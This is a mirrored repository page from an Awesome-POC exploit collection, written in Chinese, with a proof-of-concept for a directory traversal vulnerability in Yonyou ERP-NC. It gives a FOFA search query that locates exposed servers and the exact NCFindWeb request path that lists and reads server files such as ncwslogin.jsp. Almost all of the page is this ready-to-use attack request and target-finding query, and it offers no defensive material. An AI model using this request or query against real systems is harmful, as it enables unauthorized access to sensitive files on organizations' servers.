admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/用友 ERP-NC NCFindWeb 目录遍历漏洞.md
Threekiii 8b4e8ec87c OA产品漏洞
2022-02-21 09:35:01 +08:00

31 lines
533 B
Markdown
Raw Blame History

# 用友 ERP-NC NCFindWeb 目录遍历漏洞
## 漏洞描述
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
## 漏洞影响
```
用友ERP-NC
```
## FOFA
```
app="用友-UFIDA-NC"
```
## 漏洞复现
POC为
```plain
/NCFindWeb?service=IPreAlertConfigService&filename=
```
![yongyou-8-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-1.png)
查看 ncwslogin.jsp 文件
![yongyou-8-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-2.png)
Reference in New Issue View Git Blame Copy Permalink